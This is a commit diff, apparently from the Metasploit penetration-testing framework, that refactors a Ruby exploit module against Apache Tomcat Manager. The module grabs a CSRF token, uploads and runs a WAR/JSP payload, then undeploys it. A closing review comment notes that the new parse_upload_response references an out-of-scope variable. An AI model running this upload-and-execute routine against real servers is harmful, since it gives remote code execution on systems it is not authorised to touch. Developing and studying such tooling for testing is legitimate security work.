Clean exploit method

bug/bundler_fix
jvazquez-r7 2014-01-30 16:58:17 -06:00
parent 4458dc80a5
commit 9daacf8fb1
1 changed files with 87 additions and 47 deletions


@ -146,7 +146,6 @@ class Metasploit3 < Msf::Exploit::Remote
# #
# Find the session ID and the CSRF token # Find the session ID and the CSRF token
# #
print_status("#{peer} - Retrieving session ID and CSRF token...") print_status("#{peer} - Retrieving session ID and CSRF token...")
unless access_manager? unless access_manager?
fail_with(Failure::Unknown, "Unable to access the Tomcat Manager") fail_with(Failure::Unknown, "Unable to access the Tomcat Manager")
@ -155,20 +154,8 @@ class Metasploit3 < Msf::Exploit::Remote
# #
# Upload Payload # Upload Payload
# #
print_status("#{peer} - Uploading and deploying #{@app_base}...")
war = war_payload if upload_payload
upload_path = normalize_uri(target_uri.path.to_s, "html", "upload")
print_status("Uploading #{war.length} bytes as #{@app_base}.war ...")
res = send_war_payload(upload_path, war)
fail_with(Failure::Unknown, "Upload failed on #{upload_path} [No Response]") unless res
if res.code < 200 or res.code >= 300
print_warning("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}") if res.code == 401
fail_with(Failure::Unknown, "Upload failed on #{upload_path} [#{res.code} #{res.message}]")
end
report_auth_info( report_auth_info(
:host => rhost, :host => rhost,
:port => rport, :port => rport,
@ -178,30 +165,21 @@ class Metasploit3 < Msf::Exploit::Remote
:proof => "WEBAPP=\"Tomcat Manager App\", VHOST=#{vhost}, PATH=#{datastore['PATH']}", :proof => "WEBAPP=\"Tomcat Manager App\", VHOST=#{vhost}, PATH=#{datastore['PATH']}",
:active => true :active => true
) )
else
fail_with(Failure::Unknown, "Upload failed")
end
# #
# Execute Payload # Execute Payload
# #
print_status("#{peer} - Executing #{@app_base}...")
jsp_path = normalize_uri(@app_base, "#{@jsp_name}.jsp") unless execute_payload
fail_with(Failure::Unknown, "Failed to execute the payload")
print_status("Executing #{jsp_path}...")
res = send_request_cgi({
'uri' => jsp_path,
'method' => 'GET'
})
print_error("Execution failed on #{@app_base} [No Response]") unless res
if res and (res.code < 200 or res.code >= 300)
print_error("Execution failed on #{@app_base} [#{res.code} #{res.message}]")
vprint_status(res.body)
end end
# #
# Get the new CSRF token & session id # Get the new CSRF token & session id
# #
unless access_manager? unless access_manager?
fail_with(Failure::Unknown, "Unable to access the Tomcat Manager") fail_with(Failure::Unknown, "Unable to access the Tomcat Manager")
end end
@ -209,15 +187,10 @@ class Metasploit3 < Msf::Exploit::Remote
# #
# Delete the deployed payload # Delete the deployed payload
# #
print_status("#{peer} - Undeploying #{@app_base} ...")
print_status("Undeploying #{@app_base} ...") unless undeploy_app
undeploy_url = normalize_uri(target_uri.path.to_s, "html", "undeploy") print_warning("#{peer} - Failed to undeploy #{@app_base}...")
res = send_request_undeploy(undeploy_url)
print_warning("WARNING: Undeployment failed on #{undeploy_url} [No Response]") unless res
if res and (res.code < 200 or res.code >= 300)
print_warning("Deletion failed on #{path_tmp} [#{res.code} #{res.message}]")
end end
end end
def query_status def query_status
@ -307,7 +280,7 @@ class Metasploit3 < Msf::Exploit::Remote
def find_csrf(res = nil) def find_csrf(res = nil)
return "" if res.blank? return "" if res.blank?
print_status("Finding CSRF token...") vprint_status("#{peer} - Finding CSRF token...")
body = res.body body = res.body
@ -383,4 +356,71 @@ class Metasploit3 < Msf::Exploit::Remote
return true return true
end end
def upload_payload
war = war_payload
upload_path = normalize_uri(target_uri.path.to_s, "html", "upload")
vprint_status("#{peer} - Uploading #{war.length} bytes as #{@app_base}.war ...")
res = send_war_payload(upload_path, war)
return parse_upload_response(res)
end
def parse_upload_response(res)
unless res
vprint_error("#{peer} - Upload failed on #{upload_path} [No Response]")
return false
end
if res.code < 200 or res.code >= 300
vprint_warning("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}") if res.code == 401
vprint_error("Upload failed on #{upload_path} [#{res.code} #{res.message}]")
return false
end
return true
end
def execute_payload
jsp_path = normalize_uri(@app_base, "#{@jsp_name}.jsp")
vprint_status("#{peer} - Executing #{jsp_path}...")
res = send_request_cgi({
'uri' => jsp_path,
'method' => 'GET'
})
return parse_execute_response(res)
end
def parse_execute_response(res)
unless res
vprint_error("#{peer} - Execution failed on #{@app_base} [No Response]")
return false
end
if res and (res.code < 200 or res.code >= 300)
vprint_error("#{peer} - Execution failed on #{@app_base} [#{res.code} #{res.message}]")
return false
end
return true
end
def undeploy_app
undeploy_url = normalize_uri(target_uri.path.to_s, "html", "undeploy")
res = send_request_undeploy(undeploy_url)
unless res
vprint_warning("#{peer} - WARNING: Undeployment failed on #{undeploy_url} [No Response]")
return false
end
if res and (res.code < 200 or res.code >= 300)
vprint_warning("#{peer} - Deletion failed on #{undeploy_url} [#{res.code} #{res.message}]")
return false
end
return true
end
end end
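Review bot: `upload_path` is not in scope inside the new `parse_upload_response`; it is a local of `upload_payload`, and both failure branches interpolate it into their messages. Unless a method of that name is defined elsewhere in the module (not visible on this page), a failed upload would raise NameError while building the string instead of returning false, so `exploit` never reaches its own `fail_with`. Pass the path in, `def parse_upload_response(res, upload_path)` with `return parse_upload_response(res, upload_path)` in the caller. Two smaller style points: the messages in the non-2xx upload branch lack the `#{peer} - ` prefix the other new messages use, and the `res and` in `parse_execute_response` and `undeploy_app` is redundant after the preceding `unless res` guard.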